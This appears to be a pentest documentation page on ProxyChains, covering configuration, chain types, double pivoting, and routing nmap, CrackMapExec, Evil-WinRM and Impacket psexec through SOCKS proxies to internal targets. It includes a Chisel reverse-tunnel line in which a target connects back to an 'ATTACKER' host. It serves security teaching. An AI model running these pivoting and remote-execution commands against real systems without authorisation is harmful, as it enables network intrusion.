> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# ProxyChains

> ProxyChains configuration and usage: SOCKS proxy routing, chain types, and integration with pentest tools.

## Install

```bash theme={"dark"}
apt install proxychains4
```

***

## Configuration

```bash theme={"dark"}
# /etc/proxychains4.conf
```

### SOCKS5 (Most Common)

```
[ProxyList]
socks5 127.0.0.1 1080
```

### SOCKS4

```
[ProxyList]
socks4 127.0.0.1 1080
```

### HTTP Proxy

```
[ProxyList]
http 127.0.0.1 8080
```

***

## Chain Types

### strict\_chain

All proxies used in order. Fails if any proxy is down.

```
strict_chain
```

### dynamic\_chain

Skips dead proxies, uses the rest in order.

```
dynamic_chain
```

### random\_chain

Random proxy order each connection.

```
random_chain
chain_len = 2
```

***

## Double Pivot Chain

```
[ProxyList]
socks5 127.0.0.1 1080    # First pivot
socks5 127.0.0.1 1081    # Second pivot
```

Use `dynamic_chain` to handle if one goes down.

***

## Usage with Tools

### Nmap

```bash theme={"dark"}
proxychains nmap -sT -Pn -p 80,445 INTERNAL_TARGET
```

<Warning>Only TCP connect scan (`-sT`) works through ProxyChains. SYN scan (`-sS`) and UDP do not work.</Warning>

### CrackMapExec

```bash theme={"dark"}
proxychains crackmapexec smb INTERNAL_TARGET -u user -p pass
```

### Evil-WinRM

```bash theme={"dark"}
proxychains evil-winrm -i INTERNAL_TARGET -u user -p pass
```

### curl

```bash theme={"dark"}
proxychains curl http://INTERNAL_TARGET
```

### SSH

```bash theme={"dark"}
proxychains ssh user@INTERNAL_TARGET
```

### Impacket

```bash theme={"dark"}
proxychains impacket-psexec user:pass@INTERNAL_TARGET
proxychains impacket-smbclient user:pass@INTERNAL_TARGET
```

### Firefox

```bash theme={"dark"}
proxychains firefox
```

***

## Quiet Mode

Suppress ProxyChains output:

```bash theme={"dark"}
proxychains -q nmap -sT -Pn INTERNAL_TARGET
```

***

## Common Setup Patterns

### With Chisel

```bash theme={"dark"}
# Attacker: chisel server -p 8000 --reverse
# Target: chisel client ATTACKER:8000 R:socks
# proxychains4.conf: socks5 127.0.0.1 1080
```

### With SSH

```bash theme={"dark"}
# ssh -D 1080 user@pivot
# proxychains4.conf: socks5 127.0.0.1 1080
```

### With Ligolo

```bash theme={"dark"}
# Ligolo creates tun interface — no ProxyChains needed
# Use ProxyChains only if SOCKS proxy is preferred
```

***

## Troubleshooting

| Issue      | Fix                                       |
| ---------- | ----------------------------------------- |
| Timeout    | Increase `tcp_connect_time_out` in config |
| DNS leak   | Enable `proxy_dns` in config              |
| Tool hangs | Ensure tool uses TCP, not raw sockets     |
| No output  | Check proxy is actually running           |

***

## Quick Reference

| Task         | Command                           |
| ------------ | --------------------------------- |
| Basic use    | `proxychains COMMAND`             |
| Quiet        | `proxychains -q COMMAND`          |
| Config       | `/etc/proxychains4.conf`          |
| Nmap         | `proxychains nmap -sT -Pn TARGET` |
| Double pivot | Chain two SOCKS entries in config |
